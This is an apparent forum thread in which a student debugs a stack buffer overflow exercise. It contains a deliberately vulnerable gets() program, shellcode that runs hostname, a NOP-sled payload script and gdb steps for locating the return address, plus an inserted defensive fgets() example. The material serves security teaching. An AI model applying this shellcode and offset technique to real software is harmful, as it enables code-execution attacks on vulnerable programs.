Unable to run stack buffer overflow exploit
I have to inject code into the buffer overflow program below. The code should display the hostname. I have an opcode sequence (\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x0b\x50\xcd\x80) that works. I have used NOPs and a repeated return address, but I cannot get it to run the code and always get a segmentation fault. Who can help me with this?
vulnerable.c
#include <stdio.h>
#include <stdlib.h>

int vulnerable(void);   /* forward declaration so the call in main() compiles cleanly */

int
main(int argc, char **argv)
{
    char *stuff = 0;
    int len = 0;
    vulnerable();
    return 0;
}

int
vulnerable(void)
{
    char buf[100];               /* fixed-size stack buffer */
    printf("enter your name: ");
    fflush(stdout);
    gets(buf);                   /* unbounded read: overflows buf on input longer than 99 bytes */
    printf("\"%s\"\n Welcome", buf);
    return 0;
}
I compiled the program above with
gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack -o vulnerable vulnerable.c
Shellcode.py
print "\x90"*51 +"\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x0b\x50\xcd\x80" + "\xd8\xf3\xff\xbf"*6
I invoked that Python program from the command line as follows
python shellcode.py | ./vulnerable
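For contrast with the gets() call in the question, here is a bounded replacement for the read in vulnerable(), added as an example (this is not code from the question or from either answer). It assumes the same 100-byte buffer and a constructed input stream of repeated 'A' bytes, fed through tmpfile() so it runs offline; the helper names read_name_bounded and try_input are mine.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 100   /* same buffer size as the question's vulnerable() */

/* Bounded replacement for gets(buf): reads at most size-1 bytes from `in`,
   strips a trailing newline, and discards the remainder of an overlong line
   so the next read starts on a fresh line. Returns the stored length, or -1
   at end of file. The buffer is always NUL-terminated and never overrun. */
int read_name_bounded(FILE *in, char *buf, size_t size)
{
    if (fgets(buf, (int)size, in) == NULL) {
        buf[0] = '\0';
        return -1;
    }
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[--n] = '\0';                  /* whole line fit: drop the newline */
    } else {
        int c;                            /* line was truncated: drain the rest */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)n;
}

/* Constructed test drive: feeds input_len 'A' bytes plus a newline (the same
   kind of input as perl -e 'print "A"x130') into a BUF_SIZE buffer that is
   followed by a canary word. Returns the stored length, -1 if the canary
   was clobbered, -2 if no temporary file could be created. */
int try_input(size_t input_len)
{
    struct {
        char buf[BUF_SIZE];
        unsigned int canary;              /* sits right after buf in memory */
    } frame;
    frame.canary = 0xDEADBEEFu;

    FILE *f = tmpfile();
    if (f == NULL)
        return -2;
    for (size_t i = 0; i < input_len; i++)
        fputc('A', f);
    fputc('\n', f);
    rewind(f);

    int n = read_name_bounded(f, frame.buf, sizeof frame.buf);
    fclose(f);

    if (frame.canary != 0xDEADBEEFu)
        return -1;                        /* would indicate an overflow */
    return n;
}

int main(void)
{
    /* 130 bytes of input, as in the answer's test case, is truncated to 99 */
    printf("stored %d bytes, canary intact\n", try_input(130));
    return 0;
}
```

With fgets() the 130-byte line is cut at 99 bytes and the word after the buffer is untouched, whereas with gets() those extra bytes land on the saved frame pointer and return address, which is exactly what the gdb session below is used to locate.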
I suggest you turn on core dumps:
ulimit -c unlimited
Then do a simple buffer overflow, such as perl -e 'print "A"x130', and the system will generate a dump. Open it with gdb -c core and you will see %eip = 0x41414141.
Then you can reduce the injected buffer, e.g. perl -e 'print "A"x120', until you find the exact buffer size that overwrites RET.
Could you describe the steps for finding the return address?
c> shellcode.py >shellcode
c> gdb vulnerable
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(gdb) b vulnerable
Breakpoint 1 at 0x80484e6: file vulnerable.c, line 17.
(gdb) r <shellcode
Starting program: /home/armali/bin/so/c/vulnerable <shellcode
Breakpoint 1, vulnerable () at vulnerable.c:17
17 printf("enter your name: ");
(gdb) info frame
Stack level 0, frame at 0xbffff7bc:
eip = 0x80484e6 in vulnerable (vulnerable.c:17); saved eip 0x80484c9
called by frame at 0xbffff7cc
source language c.
Arglist at 0xbffff7bc, args:
Locals at 0xbffff7bc, Previous frame's sp is 0x0
Saved registers:
ebp at 0xbffff7bc, eip at 0xbffff7c0
This example shows the return address eip 0x80484c9 saved at 0xbffff7c0.